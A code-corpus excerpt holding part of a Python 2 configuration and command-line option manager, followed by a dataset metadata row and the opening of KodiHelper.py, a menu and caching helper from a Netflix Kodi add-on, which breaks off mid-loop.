self.data[key].setParent(self)
def __getitem__(self, key):
"""
Return section with given name
Return the section or if it's not a section try to
return an option by that name in the 'default' section.
"""
if self.data.has_key(key):
return self.data[key]
if self.data[DEFAULTSECT].has_key(key):
return self.data[DEFAULTSECT][key]
raise NoSectionError(key)
def getint(self, section, option):
""" Get an option value and cast it to an integer """
return self[section].getint(option)
def getfloat(self, section, option):
""" Get an option value and cast it to a float """
return self[section].getfloat(option)
def getboolean(self, section, option):
""" Get an option value and cast it to a boolean """
return self[section].get(option)
def getraw(self, section, option):
""" Get the raw (un-interpolated) value of an option """
return self[section].getraw(option)
def has_option(self, section, option):
""" Check for the existence of a given option in a given section """
if not section:
section=DEFAULTSECT
elif not self.has_key(section):
return 0
else:
return self[section].has_key(option)
def write(self, fp):
""" Write an INI-format representation of the configuration state """
fp.write(str(self))
def __str__(self):
""" Return an INI formated string with builtins removed """
return self.to_string()
def __repr__(self):
""" Return an INI formated string with builtins included """
return self.to_string(source=COMMANDLINE|CONFIGFILE|CODE|BUILTIN|REGISTRY|ENVIRONMENT)
def to_string(self, source=COMMANDLINE|CONFIGFILE):
"""
Build an INI formatted string based on the ConfigManager contents
Keyword Arguments:
source -- flag indicating which sources if information to print
Returns:
string -- INI formatted string
"""
if source & BUILTIN: func = repr
else: func = str
s = ''
keys = [x for x in self.keys() if x != DEFAULTSECT]
keys.sort()
if self[DEFAULTSECT]:
keys.insert(0, DEFAULTSECT)
for section in keys:
content = func(self[section]).strip()
if content:
s += "[%s]\n%s\n\n" % (section, content)
return s
def remove_option(self, section, option):
""" Remove an option from a section """
if not section or section == DEFAULTSECT:
sectdict = self[DEFAULTSECT]
else:
try:
sectdict = self[section]
except KeyError:
raise NoSectionError(section)
try:
del sectdict[option]
return 1
except KeyError:
return 0
def remove_section(self, section):
""" Remove the given section """
if self.has_key(section):
del self[section]
return 1
else:
return 0
def __read(self, fp, fpname):
"""
Parse an INI formatted file
The sections in the file contain a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuation are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else is ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while 1:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split()[0].lower() == 'rem' \
and line[0] in "rR": # no leading whitespace
continue
# continuation line?
if line[0] in ' \t' and cursect is not None and optname:
value = line.strip()
if value and cursect.data[optname].source == CONFIGFILE:
cursect.data[optname] += "%s" % value
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if self.has_key(sectname):
cursect = self[sectname]
else:
cursect = ConfigSection(sectname)
self[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, `line`)
# an option line?
else:
mo = self.OPTCRE.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos and optval[pos-1] in string.whitespace:
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
try:
cursect.set(optname, optval, source=CONFIGFILE)
cursect.data[optname].file = fpname
except:
print "Problem occurred in section '%s' while reading file %s." % (cursect.name, fpname)
raise
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, `line`)
# if any parsing errors occurred, raise an exception
if e:
raise e
def get_default_option(self, option):
""" Get the given option from the default section """
try:
return self[DEFAULTSECT][option]
except KeyError:
raise NoOptionError(option, DEFAULTSECT)
def get_opt(self, section, option):
""" Return the option with leading and trailing quotes removed """
optionstring = self[section][option].strip()
if (optionstring[0] == '\'' and optionstring[-1] == '\'') or \
(optionstring[0] == '\"' and optionstring[-1] == '\"'):
optionstring = optionstring[1:-1]
return optionstring
def get_optlist(self, section, option, delim=','):
"""
Return the option split into a list
Required Arguments:
section -- name of the section
option -- name of the option
Keyword Arguments:
delim -- delimiter to use when splitting the option
Returns:
list -- option value split on 'delim' with whitespace trimmed
"""
optionstring = self.get_opt( section, option )
return [x.strip() for x in optionstring.split(delim)]
def __add__(self, other):
"""
Merge items from another ConfigManager
Sections in 'other' will overwrite sections in 'self'.
"""
other = other.copy()
for key, value in other.items():
self[key] = value
try:
for key, value in other._categories.items():
self._categories[key] = value
except AttributeError: pass
return self
def __iadd__(self, other):
""" Merge items from another ConfigManager """
return self.__add__(other)
def __radd__(self, other):
"""
Merge items from another ConfigManager
Sections already in 'self' will not be overwritten.
"""
other = other.copy()
for key, value in other.items():
if not self.has_key(key):
self[key] = value
try:
for key, values in other._categories.items():
if not self._categories.has_key(key):
self._categories[key] = value
except AttributeError: pass
return self
def get_options_from_config(self):
"""
Locate all short and long options
Returns:
tuple -- two element tuple contain a list of short option
instances and a list of long option instances
"""
short_prefixes, long_prefixes = type(self).get_prefixes()
longopts = []
shortopts = []
for section in self.values():
for option in section.data.values():
for opt in option.getPossibleOptions():
opt = opt.replace('!','')
# See if the option is a long option
for prefix in long_prefixes:
if prefix is None:
pass
elif not prefix.strip():
pass
elif opt.startswith(prefix):
if option not in longopts:
longopts.append(option)
continue
# See if the option is a short option
for prefix in short_prefixes:
if prefix is None:
pass
elif not prefix.strip():
pass
elif opt.startswith(prefix):
if option not in shortopts:
shortopts.append(option)
return shortopts, longopts
def getopt(self, args=None, merge=1):
"""
Parse the command line
Keyword Arguments:
args -- list of strings containing the command line. If this is
not given, sys.argv[1:] is used.
merge -- boolean flag indicating whether parsed options should
be merged into the configuration or not
Returns:
tuple -- two element tuple where the first element is a list of
parsed options in the form '(option, value)' and the second
element is a list of unparsed arguments
"""
if args is None: args = sys.argv[1:]
shortopts, longopts = self.get_options_from_config()
short_prefixes, long_prefixes = type(self).get_prefixes()
opts = []
while args and args[0] not in short_prefixes:
# If the argument is equal to one of the long prefixes,
# throw it away and bail out.
if args[0] in long_prefixes:
args = args[1:]
break
# Parse long options
if [x for x in long_prefixes if args[0].startswith(x)]:
try:
opts, args = self.do_longs(opts,args[0],longopts,args[1:])
except UnrecognizedArgument, e:
if self.strict: raise
opts, args = self.handle_unrecognized(e[1],opts,args,'long')
if merge: self.unrecognized.append(opts[-1])
# Parse short options
elif [x for x in short_prefixes if args[0].startswith(x)]:
try:
opts, args = self.do_shorts(opts,args[0],shortopts,args[1:])
except UnrecognizedArgument, e:
if self.strict: raise
opts, args = self.handle_unrecognized(e[1],opts,args,'short')
if merge: self.unrecognized.append(opts[-1])
# No option found. We're done.
else: break
# Merge command line options with configuration
if merge:
self.merge_options(opts)
self.check_mandatory_options()
return opts, args
def check_mandatory_options(self):
"""
Make sure that all mandatory options have been set
"""
for section in self.values():
for option in section.values():
if not option.mandatory: continue
if option.getValue() in [None,[]]:
names = ', '.join(option.getPossibleOptions())
if not names:
names = option.name
raise MandatoryOption, ('The %s option is mandatory, but was not given' % names, names)
def handle_unrecognized(self, option, opts, args, type='long'):
"""
Try to parse unrecognized options and their arguments
Required Arguments:
option -- the actual option parsed from the command-line
which was not recognized
opts -- tuples of already parsed options and their values
args -- remaining unparsed command-line arguments
Keyword Arguments:
type -- flag indicating which type of argument to parse.
This should be either "short" or "long".
"""
if type == 'long':
args.pop(0)
# Explicitly specified value
if option.find('=') + 1:
option, value = option.split('=',1)
opts.append((option, value))
return opts, args
# Implicitly specified value
if self.has_following_argument(args):
opts.append((option, args.pop(0)))
return opts, args
# No argument found
opts.append((option, None))
return opts, args
elif type == 'short':
short_prefixes, long_prefixes = self.get_prefixes()
prefix = [x for x in short_prefixes if option.startswith(x)][0]
start, end = args[0].split(option.replace(prefix,'',1),1)
if end: args[0] = prefix + end
else: args.pop(0)
opts.append((option, ''))
return opts, args
raise ValueError, 'Expecting type of "short" or "long".'
def merge_options(self, options):
""" Merge options parsed from the command line into configuration """
from Generic import GenericOption
from Multi import MultiOption
# Multi options that have been cleared by a command line option.
# Lists will only be cleared on the first command line option, all
# consecutive options will append.
for option, value in options:
# opts = self.getPossibleOptions()
# negative = [x.replace('!','',1) for x in opts if x.startswith('!')]
# positive = [x for x in opts if not x.startswith('!')]
if isinstance(option, GenericOption):
option.source = COMMANDLINE
option.file = None
if type(value) in [list, tuple]:
if not isinstance(option, MultiOption):
value = ' '.join(value)
option.occurrences += 1
option.setValue(value)
else:
if option.occurrences:
option.occurrences += 1
option += value
else:
option.occurrences += 1
option.setValue(value)
else:
option.occurrences += 1
option.setValue(value)
def get_prefixes(cls):
""" Prepare option prefixes to make sure that they are always lists """
long_prefixes = cls.long_prefix
short_prefixes = cls.short_prefix
if type(long_prefixes) not in [list, tuple]:
long_prefixes = [long_prefixes]
if type(short_prefixes) not in [list, tuple]:
short_prefixes = [short_prefixes]
return [x for x in short_prefixes if x],[x for x in long_prefixes if x]
get_prefixes = classmethod(get_prefixes)
def do_longs(self, opts, opt, longopts, args):
"""
Parse a long option
Required Arguments:
opts -- list of parsed options
opt -- string containing current option
longopts -- list of long option instances
args -- remaining argument list
Returns:
tuple -- two element tuple where the first argument is the
'opts' list with the latest argument added and the second
element is the 'args' list with the arguments from the
current option removed
"""
forcedarg = False
if opt.find('=') + 1:
forcedarg = True
opt, arg = opt.split('=', 1)
args.insert(0, arg)
option = self.get_match(opt, longopts)
option.actual = opt
option.file = None
# If we have an argument, but the option doesn't accept one, bail out.
if forcedarg and not(option.acceptsArgument()):
raise UnspecifiedArgument('option %s must not have an argument' \
% opt, opt)
elif forcedarg:
optarg, args = option.getArgument(args, forcedarg=True)
elif not(option.acceptsArgument()):
pass
# Parse the following arguments
else:
# See if we have a possible following argument
if not type(self).has_following_argument(args):
# No argument found, but we require one.
if option.requiresArgument():
raise RequiresArgument('option %s requires argument' \
% opt, opt)
# Parse the argument
optarg, args = option.getArgument(args)
# Convert boolean options to proper value
if not forcedarg and isinstance(option, BooleanOption):
options = option.getPossibleOptions()
negative = [x.replace('!','',1) for x in options
if x.startswith('!')]
# positive = [x for x in options if not x.startswith('!')]
if opt in negative:
optarg = 0
else:
optarg = 1
opts.append((option, optarg))
return opts, args
def has_following_argument(cls, args):
"""
Return boolean indicating the existence of a following argument
Required Arguments:
args -- command-line arguments to inspect for following argument.
Returns:
boolean -- true, if following argument exists
"""
short_prefixes, long_prefixes = cls.get_prefixes()
# No arguments at all
if not(args):
return 0
# The next argument has an option prefix and it doesn't consist
# entirely of a prefix.
if [x for x in long_prefixes+short_prefixes if args[0].startswith(x)] \
and args[0] not in long_prefixes+short_prefixes:
return 0
# All other cases fail. This must be an argument.
return 1
has_following_argument = classmethod(has_following_argument)
def get_match(self, opt, longopts):
"""
Get possible matches for the given option
Required Arguments:
opt -- name of the current option
longopts -- list of all long option instances
Returns:
instance -- an instance of the option which matches
"""
possibilities = []
for o in longopts:
match = o.matches(opt)
if match:
possibilities.append((match, o))
if not possibilities:
raise UnrecognizedArgument('option %s not recognized' % opt, opt)
# Is there an exact match?
option = [x for x in possibilities if opt == x[0]]
if option:
return option[0][1]
# No exact match, so better be unique.
if len(possibilities) > 1:
# XXX since possibilities contains all valid continuations,
# might be nice to work them into the error msg
raise NonUniquePrefix('option %s not a unique prefix' % opt, opt)
assert len(possibilities) == 1
return possibilities[0][1]
def do_shorts(self, opts, optstring, shortopts, args):
"""
Parse a short argument
Required Arguments:
opts -- list of parsed options
optstring -- string containing current option
shortopts -- list of short option instances
args -- remaining argument list
Returns:
tuple -- two element tuple where the first argument is the
'opts' list with the latest argument added and the second
element is the 'args' list with the arguments from the
current option removed
"""
short_prefixes, long_prefixes = type(self).get_prefixes()
optstring.strip()
if not optstring:
return [], args
prefix = optstring[0]
optstring = optstring[1:]
while optstring != '':
opt, optstring = optstring[0], optstring[1:]
option = self.get_match(prefix+opt, shortopts)
option.actual = prefix+opt
option.file = None
# See if we need to check for an argument
if option.acceptsArgument():
if optstring == '':
# Are there any following arguments?
if not type(self).has_following_argument(args):
# No argument found, but we require one.
if option.requiresArgument():
raise RequiresArgument('option %s requires argument' \
% opt, opt)
optarg, args = option.getArgument(args)
else:
optarg, args = option.getArgument([optstring]+args)
# No argument was found
if args and args[0] == optstring:
optarg = None
optstring = args.pop(0)
else:
optstring = ''
else:
optarg = None
# Convert boolean options to proper value
if optarg is None and isinstance(option, BooleanOption):
options = option.getPossibleOptions()
negative = [x.replace('!','',1) for x in options
if x.startswith('!')]
# positive = [x for x in options if not x.startswith('!')]
if prefix+opt in negative:
optarg = 0
else:
optarg = 1
opts.append((option, optarg))
return opts, args
def usage_on(self, options):
"""
Print full help for listed options and exit
Required Arguments:
options -- list of strings indicating which options to list
help on (preceding '-' and '--' should be removed)
"""
display = []
for sectkey, section in self.items():
for optkey, option in section.items():
if option.long in options or option.short in options:
display.append((sectkey, optkey, option))
display.reverse()
err = sys.stderr.write
while display:
sectkey, optkey, opt = display.pop()
err('Command Line: %s\n' % self._option_usage(opt))
err('Configuration File: [%s] %s=\n' % (sectkey, optkey))
current = opt.names()['current']
if current != None: err('Current Value: %s\n\n' % current)
else: err('\n')
err('%s\n\n' % opt.description)
if display: err('\n')
sys.exit(1)
def _option_usage(self, option):
""" Return the option the way it can be typed at the command line """
if option.options.strip():
short_prefixes, long_prefixes = self.get_prefixes()
prefixes = long_prefixes + short_prefixes
options = re.sub(r'\s+', r' ', option.options.replace('!',''))
options = options.split()
options = [(len(x),x) for x in options
if [x for p in prefixes if x.startswith(p)]]
options.sort()
options = [x[1] for x in options]
# Determine argument separator
sep = ' '
loptions = [x for x in options
if [x for p in long_prefixes if x.startswith(p)]]
if loptions:
sep = '='
options = ', '.join(options)
if option.acceptsArgument() and option.requiresArgument():
return '%s%s%s' % (options, sep, option.synopsis)
elif option.acceptsArgument():
return '%s[%s%s]' % (options, sep, option.synopsis)
else:
return options
return ''
def usage(self, categories=[]):
""" Print descriptions of all command line options """
categories = categories[:]
options = []
for section in self.values():
for option in section.data.values():
if option.options:
options.append(option)
options.sort()
if not options: return ''
name_len = 0
summary_len = 0
# Put options into categories
categorized = {}
for option in options:
catname = self.get_category(option.category).strip()
name = self._option_usage(option)
summary = ''
if option.summary:
summary = option.summary % option.names()
default = option.defaultValue()
if default is not None:
summary += ' [%s]' % default
if not categorized.has_key(catname):
categorized[catname] = []
categorized[catname].append((name,summary,option))
if summary:
name_len = max(name_len,len(name))
summary_len = max(summary_len,len(summary))
name_len = min(name_len, int(TERMINAL_WIDTH*MAX_NAME_WIDTH_RATIO))
summary_len = TERMINAL_WIDTH - PREPAD - GUTTER - name_len
# Build the output string
s = ''
if categories:
categories = [self.get_category(x) for x in categories]
else:
categories = categorized.keys()
categories.sort()
for category in categories:
options = categorized[category]
if not category:
if len(categories) > 1:
category = 'General Options'
else:
category = 'Options'
s += '\n%s:\n' % category
for name, summary, option in options:
length = len(name)
summary = wrap(summary, summary_len)
summary = ('\n%s' % (' '*(PREPAD+name_len+GUTTER))).join(summary)
# Be lenient on the gutter if we are really close to
# fitting in the allocated space
format = '%s%s%s%s\n'
colspace = max(GUTTER + name_len - length, GUTTER)
if summary and ((name_len + GUTTER) > length):
colspace = (name_len + GUTTER) - length
elif summary and length > name_len:
colspace = PREPAD + name_len + GUTTER
format = '%s%s\n%s%s\n'
s += format % (' '*PREPAD, name, ' '*colspace, summary)
return s
class CommandLineManager(ordereddict):
""" Command-Line Argument Manager """
def __init__(self, data={}):
ordereddict.__init__(self, data)
self._associations = {}
def usage(self):
s = ''
for item in self.values():
if isinstance(item, ConfigManager):
s += item.usage()
else:
break
return s
def requiresArgument(self):
""" Return boolean indicating if config requires an argument """
if not self: return 0
for key in self:
item = ordereddict.__getitem__(self, key)
if isinstance(item, GenericArgument):
if item.mandatory:
return 1
def getopt(self, args=None):
if args == None:
args = sys.argv[1:]
else:
args = args[:]
if not self: return self
for key in self:
item = ordereddict.__getitem__(self, key)
association = self._associations.get(key, None)
if isinstance(item, ConfigManager):
if association:
item.read(association)
options, args = item.getopt(args)
elif isinstance(item, GenericArgument):
value, args = item.getArgument(args)
item.setValue(value)
else:
raise ValueError, "Unrecognized argument type."
if len(args):
raise TooManyValues, \
'Too many command-line arguments: %s' % ' '.join(args)
return self
def __setitem__(self, key, value):
item = value
if type(value) in [types.TupleType, types.ListType]:
value = list(value)
item = value.pop(0)
self._associations[key] = value
assert isinstance(item, ConfigManager) or \
isinstance(item, GenericArgument), \
'Command-line parameters must be ConfigManagers or ' + \
'subclasses of GenericArgument'
if hasattr(item, 'name') and item.name is None:
item.name = key
ordereddict.__setitem__(self, key, item)
def __getitem__(self, key):
if type(key) == types.SliceType:
return self.__getslice__(key.start, key.stop)
item = ordereddict.__getitem__(self, key)
if isinstance(item, ConfigManager):
return item
else:
return item.getValue()
# These must be loaded last because they depend on variables
# assigned in this file.
from Generic import GenericOption, GenericArgument
from String import StringOption, StringArgument
from Integer import IntegerOption, IntegerArgument
from Float import FloatOption, FloatArgument
from Multi import MultiOption, MultiArgument
from Compound import CompoundOption, CompoundArgument
from Boolean import BooleanOption, BooleanArgument
from Files import OutputFileOption, InputFileOption
from Directories import OutputDirectoryOption, InputDirectoryOption
from Files import OutputFileArgument, InputFileArgument
from Directories import OutputDirectoryArgument, InputDirectoryArgument
from Counted import CountedOption, CountedArgument
if __name__ == '__main__':
# Instantiate a new option parser
op = ConfigManager()
op.set_strict(FALSE)
# Set option prefixes for short and long options. If the short
# prefix is set to None, all options will act like long options.
ConfigManager.short_prefix = '-'
ConfigManager.long_prefix = '--'
debugging = op.add_category('debugging','Debugging')
# Create a new section
logging = op.add_section('logging')
logging['compare'] = MultiOption(
options = '--compare',
range = [0,2],
delim = ',',
environ = 'COMPARE',
# mandatory = 1,
template = FloatOption,
)
logging['testopts'] = CompoundOption(
options = '--testopts',
environ = 'TESTOPTS',
)
logging['verbose'] = BooleanOption(
options = '--verbose -v !-q !--quiet',
environ = 'VERBOSE',
default = 0,
category = 'debugging',
)
# Explicitly specify an integer option
logging['debug'] = CountedOption(
'''
Set the debugging level
This option sets the verbosity of debugging messages.
''',
options = '--debug -d !-u',
default = 0,
environ = 'DEBUG',
category = 'debugging',
)
# Explicitly specify another integer option
logging['warning'] = IntegerOption(
'''
Set the warning level
This option sets the verbosity of warning messages.
Valid Values:
The warning level must be an integer between 0 and 10.
''',
options = '--warning -w',
values = [0,10],
default = 1
)
# Implicitly declare a float option
logging['log'] = 1.2
# Implicitly declare a float option
logging['note'] = 2
files = op.add_section('files')
files['output-file'] = OutputFileOption(
''' Where the results will go. This is the output file that will contain your output ''',
options = '--output-file -o',
synopsis = 'OUTPUT-FILENAME',
)
files['input-file'] = InputFileOption(
''' Where the input will come from ''',
options = '--input-file -i',
)
files['input-dir'] = InputDirectoryOption(
''' Where the input will come from ''',
options = '--input-dir -I',
)
files['output-dir'] = OutputDirectoryOption(
''' Where the output will come from. This must be a directory or it won\'t work ''',
options = '--output-dir -D',
)
# Read in configuration files
#op.read('/home/username/.myconfrc')
op.read('./testconfig')
# Call the option parser to parse the command line
opts, args = op()
# Print out current information
print
print '-- Parsed Options --'
print
# print opts
# print args
# print op['logging']['debug'], op.data['logging'].data['debug'].file
# print op['logging']['compare'], op.data['logging'].data['compare'].file
for option, value in opts:
# Option was recognized
if isinstance(option, GenericOption):
print '%s.%s: %s' % (option.parent.name, option.name, value)
# Unrecognized options
else:
print '(unknown) %s: %s' % (option, value)
print
# Print unrecognized options
print '-- Unrecognized options --'
print
print op.unrecognized
print
# Print remaining unparsed arguments
print '-- Remaining Arguments --'
print
print args
print
sources = \
[('Command-Line Options', COMMANDLINE),
('Config File Options', CONFIGFILE),
('Environment Options', ENVIRONMENT),
('Builtin Options', BUILTIN)]
for title, bit in sources:
print '-- %s --' % title
print
for section in op.values():
for option in section.values():
if option.source & bit:
print '%s.%s: %s' % (section.name, option.name, option.getValue())
print
# Print out a usage message
print '-- Usage --'
print
print op.usage()
print
# Print out a usage message for one category
print '-- Single Category Usage --'
print
print op.usage(['debugging'])
print
# Print out an INI representation of the current settings
print '-- Current Configuration --'
print
print repr(op)
print '-- Command-Line Manager --'
print
outputfile = StringArgument("Output File", name='foo', values=('add','subtract','multiply','divide'))
number = IntegerArgument("Number of times to iterate", name='bar')
clm = CommandLineManager(op, outputfile, number)
print clm()
for item in clm:
print '%s: %s' % (type(item), item)
| mit | -2,288,027,374,097,825,300 | 32.894766 | 116 | 0.556989 | false |
mrquim/repository.mrquim | repo/plugin.video.netflix/resources/lib/KodiHelper.py | 4 | 56995 | # pylint: skip-file
# -*- coding: utf-8 -*-
# Module: KodiHelper
# Created on: 13.01.2017
import re
import json
import base64
import hashlib
from os import remove
from uuid import uuid4
from urllib import urlencode
import AddonSignals
import xbmc
import xbmcgui
import xbmcplugin
import inputstreamhelper
from resources.lib.ui.Dialogs import Dialogs
from resources.lib.NetflixCommon import Signals
from utils import get_user_agent
from UniversalAnalytics import Tracker
try:
import cPickle as pickle
except:
import pickle
try:
# Python 2.6-2.7
from HTMLParser import HTMLParser
except ImportError:
# Python 3
from html.parser import HTMLParser
VIEW_FOLDER = 'folder'
VIEW_MOVIE = 'movie'
VIEW_SHOW = 'show'
VIEW_SEASON = 'season'
VIEW_EPISODE = 'episode'
VIEW_EXPORTED = 'exported'
CONTENT_FOLDER = 'files'
CONTENT_MOVIE = 'movies'
CONTENT_SHOW = 'tvshows'
CONTENT_SEASON = 'seasons'
CONTENT_EPISODE = 'episodes'
def _update_if_present(source_dict, source_att, target_dict, target_att):
if source_dict.get(source_att):
target_dict.update({target_att: source_dict[source_att]})
class KodiHelper(object):
"""
Consumes all the configuration data from Kodi as well as
turns data into lists of folders and videos"""
def __init__(self, nx_common, library):
"""
Provides helpers for addon side (not service side)
"""
self.nx_common = nx_common
self.plugin_handle = nx_common.plugin_handle
self.base_url = nx_common.base_url
self.library = library
self.custom_export_name = nx_common.get_setting('customexportname')
self.show_update_db = nx_common.get_setting('show_update_db')
self.default_fanart = nx_common.get_addon_info('fanart')
self.setup_memcache()
self.dialogs = Dialogs(
get_local_string=self.get_local_string,
custom_export_name=self.custom_export_name)
self._context_menu_actions = None
def refresh(self):
"""Refresh the current list"""
return xbmc.executebuiltin('Container.Refresh')
def toggle_adult_pin(self):
"""Toggles the adult pin setting"""
adultpin_enabled = False
raw_adultpin_enabled = self.nx_common.get_setting('adultpin_enable')
if raw_adultpin_enabled == 'true' or raw_adultpin_enabled == 'True':
adultpin_enabled = True
if adultpin_enabled is False:
return self.nx_common.set_setting('adultpin_enable', 'True')
return self.nx_common.set_setting('adultpin_enable', 'False')
def set_main_menu_selection(self, type):
"""Persist the chosen main menu entry in memory
Parameters
----------
type : :obj:`str`
Selected menu item
"""
current_window = xbmcgui.getCurrentWindowId()
xbmcgui.Window(current_window).setProperty('main_menu_selection', type)
def get_main_menu_selection(self):
"""Gets the persisted chosen main menu entry from memory
Returns
-------
:obj:`str`
The last chosen main menu entry
"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
return window.getProperty('main_menu_selection')
def setup_memcache(self):
"""Sets up the memory cache if not existant"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = window.getProperty('memcache')
# no cache setup yet, create one
if len(cached_items) < 1:
window.setProperty('memcache', pickle.dumps({}))
except EOFError:
pass
def invalidate_memcache(self):
"""Invalidates the memory cache"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
window.setProperty('memcache', pickle.dumps({}))
except EOFError:
pass
def get_cached_item(self, cache_id):
"""Returns an item from the in memory cache
Parameters
----------
cache_id : :obj:`str`
ID of the cache entry
Returns
-------
mixed
Contents of the requested cache item or none
"""
ret = None
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = pickle.loads(window.getProperty('memcache'))
ret = cached_items.get(cache_id)
except EOFError:
ret = None
return ret
def add_cached_item(self, cache_id, contents):
"""Adds an item to the in memory cache
Parameters
----------
cache_id : :obj:`str`
ID of the cache entry
contents : mixed
Cache entry contents
"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = pickle.loads(window.getProperty('memcache'))
cached_items.update({cache_id: contents})
window.setProperty('memcache', pickle.dumps(cached_items))
except EOFError:
pass
def set_custom_view(self, content):
"""Set the view mode
Parameters
----------
content : :obj:`str`
Type of content in container
(folder, movie, show, season, episode, login, exported)
"""
custom_view = self.nx_common.get_setting('customview')
if custom_view == 'true':
view = int(self.nx_common.get_setting('viewmode' + content))
if view != -1:
xbmc.executebuiltin('Container.SetViewMode(%s)' % view)
def save_autologin_data(self, autologin_user, autologin_id):
"""Write autologin data to settings
Parameters
----------
autologin_user : :obj:`str`
Profile name from netflix
autologin_id : :obj:`str`
Profile id from netflix
"""
self.nx_common.set_setting('autologin_user', autologin_user)
self.nx_common.set_setting('autologin_id', autologin_id)
self.nx_common.set_setting('autologin_enable', 'True')
self.dialogs.show_autologin_enabled_notify()
self.invalidate_memcache()
self.refresh()
def build_profiles_listing(self, profiles, action, build_url):
"""
Builds the profiles list Kodi screen
:param profiles: list of user profiles
:type profiles: list
:param action: action paramter to build the subsequent routes
:type action: str
:param build_url: function to build the subsequent routes
:type build_url: fn
:returns: bool -- List could be build
"""
# init html parser for entity decoding
html_parser = HTMLParser()
# build menu items for every profile
for profile in profiles:
# load & encode profile data
enc_profile_name = profile.get('profileName', '').encode('utf-8')
unescaped_profile_name = html_parser.unescape(enc_profile_name)
profile_guid = profile.get('guid')
# build urls
url = build_url({'action': action, 'profile_id': profile_guid})
autologin_url = build_url({
'action': 'save_autologin',
'autologin_id': profile_guid,
'autologin_user': enc_profile_name})
# add list item
list_item = xbmcgui.ListItem(
label=unescaped_profile_name,
iconImage=profile.get('avatar'))
list_item.setProperty(
key='fanart_image',
value=self.default_fanart)
# add context menu options
auto_login = (
self.get_local_string(30053),
'RunPlugin(' + autologin_url + ')')
list_item.addContextMenuItems(items=[auto_login])
# add directory & sorting options
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url,
listitem=list_item,
isFolder=True)
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
return xbmcplugin.endOfDirectory(handle=self.plugin_handle)
def build_main_menu_listing(self, video_list_ids, user_list_order, actions,
build_url, widget_display=False):
"""
Builds the video lists (my list, continue watching, etc.) Kodi screen
Parameters
----------
video_list_ids : :obj:`dict` of :obj:`str`
List of video lists
user_list_order : :obj:`list` of :obj:`str`
Ordered user lists
to determine what should be displayed in the main menue
actions : :obj:`dict` of :obj:`str`
Dictionary of actions to build subsequent routes
build_url : :obj:`fn`
Function to build the subsequent routes
Returns
-------
bool
List could be build
"""
preselect_items = []
for category in user_list_order:
for video_list_id in video_list_ids['user']:
if video_list_ids['user'][video_list_id]['name'] == category:
label = video_list_ids['user'][video_list_id]['displayName']
if category == 'netflixOriginals':
label = label.capitalize()
li = xbmcgui.ListItem(label=label, iconImage=self.default_fanart)
li.setProperty('fanart_image', self.default_fanart)
# determine action route
action = actions['default']
if category in actions.keys():
action = actions[category]
# determine if the item should be selected
preselect_items.append((False, True)[category == self.get_main_menu_selection()])
url = build_url({'action': action, 'video_list_id': video_list_id, 'type': category})
xbmcplugin.addDirectoryItem(handle=self.plugin_handle, url=url, listitem=li, isFolder=True)
# add recommendations/genres as subfolders
# (save us some space on the home page)
i18n_ids = {
'recommendations': self.get_local_string(30001),
'genres': self.get_local_string(30010)
}
for type in i18n_ids.keys():
# determine if the lists have contents
if len(video_list_ids[type]) > 0:
# determine action route
action = actions['default']
if type in actions.keys():
action = actions[type]
# determine if the item should be selected
preselect_items.append((False, True)[type == self.get_main_menu_selection()])
li_rec = xbmcgui.ListItem(
label=i18n_ids[type],
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': type})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# add search as subfolder
action = actions['default']
if 'search' in actions.keys():
action = actions[type]
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30011),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': 'search'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# add exported as subfolder
action = actions['default']
if 'exported' in actions.keys():
action = actions[type]
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30048),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': action, 'type': 'exported'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
if self.show_update_db == 'true':
# add updatedb as subfolder
li_rec = xbmcgui.ListItem(
label=self.get_local_string(30049),
iconImage=self.default_fanart)
li_rec.setProperty('fanart_image', self.default_fanart)
url_rec = build_url({'action': 'updatedb'})
xbmcplugin.addDirectoryItem(
handle=self.plugin_handle,
url=url_rec,
listitem=li_rec,
isFolder=True)
# no sorting & close
xbmcplugin.addSortMethod(
handle=self.plugin_handle,
sortMethod=xbmcplugin.SORT_METHOD_UNSORTED)
xbmcplugin.setContent(
handle=self.plugin_handle,
content=CONTENT_FOLDER)
xbmcplugin.endOfDirectory(self.plugin_handle)
# (re)select the previously selected main menu entry
idx = 1
for item in preselect_items:
idx += 1
